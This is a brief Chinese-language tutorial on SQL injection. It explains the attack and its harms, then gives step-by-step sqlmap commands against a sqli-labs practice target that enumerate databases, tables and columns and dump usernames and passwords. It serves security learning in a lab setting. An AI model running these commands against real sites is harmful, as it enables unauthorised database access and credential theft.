什么是sql注入?
SQL 注入是一种代码渗透技术,是最常用的网络黑客技术之一。
SQL 注入非常危险,可能会导致数据库中的数据被暴露,甚至被损坏。
sql注入的危害?
SQL 注入会带来很多危害,包括但不限于:
骗过登录校验,查看用户登录后的详细信息(例如发布的评论、购买的商品、邮寄地址等),
这是 SQL 注入的最简单形式;
更新、删除和插入记录,破坏数据库中的数据;
在服务器上执行命令,该命令可以下载和安装木马等恶意程序;
将有价值的用户数据(例如邮箱、密码、信用卡等)导出到攻击者的远程计算机
测试地址: http://192.168.1.7/sqli-labs/Less-2/?id=2
sqlmap -h 获取帮助
sqlmap -u "url" 检测注入点
--dbs 列出所有数据库的名字
--current-db 列出当前数据库的名字
-D 指定一个数据库
--tables 列出表名
-T 指定表名
--columns 列出所有的字段名
-C 指定字段
--dump 列出字段内容
sqlmap -h 获取帮助
sqlmap -h 获取帮助
检测注入点
sqlmap -u “url” 检测注入点
sqlmap -u “http://192.168.1.7/sqli-labs/Less-2/?id=2”
列出所有数据库的名字
sqlmap -u “http://192.168.1.7/sqli-labs/Less-2/?id=2” --dbs
列出当前数据库的名字
sqlmap -u “http://192.168.1.7/sqli-labs/Less-2/?id=2” --current-db
指定一个数据库列出表名
sqlmap -u “http://192.168.1.7/sqli-labs/Less-2/?id=2” -D “security” --tables
指定表名列出字段名
sqlmap -u “http://192.168.1.7/sqli-labs/Less-2/?id=2” -T users --columns
指定字段列出字段内容
sqlmap -u “http://192.168.1.7/sqli-labs/Less-2/?id=2” -D “security” -T “users” -C “username,password” --dump